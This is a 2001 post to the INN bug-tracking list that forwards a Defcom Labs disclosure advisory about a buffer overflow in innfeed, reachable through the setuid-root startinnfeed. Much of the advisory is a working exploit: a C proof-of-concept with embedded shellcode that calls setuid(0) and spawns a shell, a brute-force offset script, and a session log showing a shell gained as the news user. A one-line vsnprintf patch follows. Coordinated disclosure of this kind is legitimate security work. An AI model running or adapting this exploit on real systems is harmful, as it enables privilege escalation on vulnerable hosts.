innfeed vulnerability

Enrique A. Sanchez Montellano enrique.sanchez at defcom.com
Mon Apr 9 17:18:59 UTC 2001 

Woohoo! took me a while since I have a lot of work but finally I came 
with the fix, it s aone liner and I made a .diff file so a patch can be 
easelly aplied. I attach the advisory in full so you can read it and 
tell me a date in wich you can have the system patched (Also an URL in 
wich the fix would be).

Thank you for your time

Enrique A. Sanchez Montellano
Chief Technical Officer Defcom Spain
+(34) 91 308 0175


-- Attached file included as plaintext by Listar --
-- File: startinnfeed.txt

======================================================================
                  Defcom Labs Advisory def-2001-01

	             innfeed buffer overflow

Author: Enrique A. Sanchez Montellano <@defcom.com>
Author: Alex Hernandez <alex.hernandez at defcom.com>
Release Date: 2001-03-19 (TENTATIVE)
======================================================================
------------------------=[Brief Description]=-------------------------
innfeed is a program that implements the NNTP protocol for transerring
news between computers.

Due to no bounds checking on the innfeed program a buffer overflow
occurs while using the -c flag, thus rendering complete control
of the stack. And rendering news uid and gid.

------------------------=[Affected Systems]=--------------------------
Linux: Slackware, Mandrake, RedHat.

----------------------=[Detailed Description]=------------------------
Due to no bounds checking on the logOrPrint() function on the vsprint()
a stack overflow occurs thus rendering the stack. The user then is able
to gain news id, in wich he can the trojan binaries to gain further 
access to upgrade his priviledges.

Offending code:
---------------

vsprintf (buffer,fmt,ap) ;

Example of exploitation:
------------------------

nahual at shell:~$ ls -al /usr/lib/news/bin/innfeed
-r-xr-x---   1 news     news       213124 Jun 14  2000 /usr/lib/news/bin/innfeed*
nahual at shell:~$ ls -al /usr/lib/news/bin/startinnfeed
-r-sr-x---   1 root     news        40796 Jun 14  2000 /usr/lib/news/bin/startinnfeed*
nahual at shell:~$ id
uid=1001(nahual) gid=100(users) groups=100(users),13(news)
nahual at shell:~$ ./x-innfeed
[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]
------------------------------------------------------------
[ + ] Found by:

[ + ] Alex Hernandez (alex.hernandez at defcom.com)
[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)
[ + ] Defcom Labs @ Spain ....
[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)

[ + ] Using address 0xbffff9e4
[ + ] Starting exploitation ...

bash$ id
uid=9(news) gid=13(news) groups=100(users),13(news)
bash$
----

Proof of concept code:
----------------------

--- x-startinnfeed.c ---
/*
  x-innfeed.c

  Buffer overflow in innfeed being called from startinnfeed renders uid(news) gid(news), startinnfeed is suid root so I have to also check if I can manage to get root out of this ....

  Enrique A. Sanchez Montellano
  (@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET  0
#define ALIGN   0
#define BUFFER  470

// MANDRAKE, REDHAT, etc....

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
char shellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
              "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
              "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
              "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
static char shellcode[]=
"\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

unsigned long get_sp(void) {
  __asm__("movl %esp, %eax");
}

void usage(char *name) {
  printf("Usage: %s <offset> <align> <buffer>\n", name);
  printf("Defcom Labs @ Spain ...\n");
  printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
  exit(0);
}

int main(int argc, char **argv) {
  char *code;
  int offset = OFFSET;
  int align = ALIGN;
  int buffer = BUFFER;
  unsigned long addr;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) buffer = atoi(argv[3]);

  code = (char *)malloc(buffer);

  printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
  printf("------------------------------------------------------------\n");
  printf("[ + ] Found by: \n\n[ + ] Alex Hernandez (alex.hernandez at defcom.com) \n[ + ] Enrique Sanchez (@defcom.com ... Yes is just @defcom.com)\n");
  printf("[ + ] Defcom Labs @ Spain ....\n");
  printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

  addr = get_sp() - offset;

  printf("[ + ] Using address 0x%x\n", addr);

  for(i = 0; i <= buffer; i += 4) {
    *(long *)&code[i] = 0x90909090;
  }

  *(long *)&code[buffer - 4] = addr;
  *(long *)&code[buffer - 8] = addr;

  memcpy(code + buffer - strlen(shellcode) -8 - align, shellcode, strlen(shellcode));

  printf("[ + ] Starting exploitation ... \n\n");

  // REDHAT, MANDRAKE ...
#ifdef REDHAT
  execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

  // SLACKWARE
#ifdef SLACKWARE
  execl("/usr/lib/news/bin/startinnfeed", "/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

  return 0;
}

--- x-startinnfeed.c ---

--- brute.sh ---
#!/bin/ksh
L=-2000
O=40
while [ $L -lt 12000 ] 
do 
echo $L
L=`expr $L + 1`
./x-startinnfeed $L  
done
--- brute.sh ---

---------------------------=[Workaround]=-----------------------------
Defcom has issued a patch for the vulnerability:

---innfeed-overflow.patch---
210c210
<       vsprintf (buffer,fmt,ap) ;
---
>       vsnprintf (buffer,512,fmt,ap) ;
---innfeed-overflow.patch---

A patched version is also available at <URL GOES HERE>

-------------------------=[Vendor Response]=--------------------------
<DUDE WHO ANSWERED ME> responded in a fast and swift way
answering questions and checking our patch.

Thank you to him and all the INN team for their time and responses.
======================================================================
         This release was brought to you by Defcom Labs @ Spain

              labs at defcom.com             www.defcom.com            
======================================================================

More information about the inn-bugs mailing list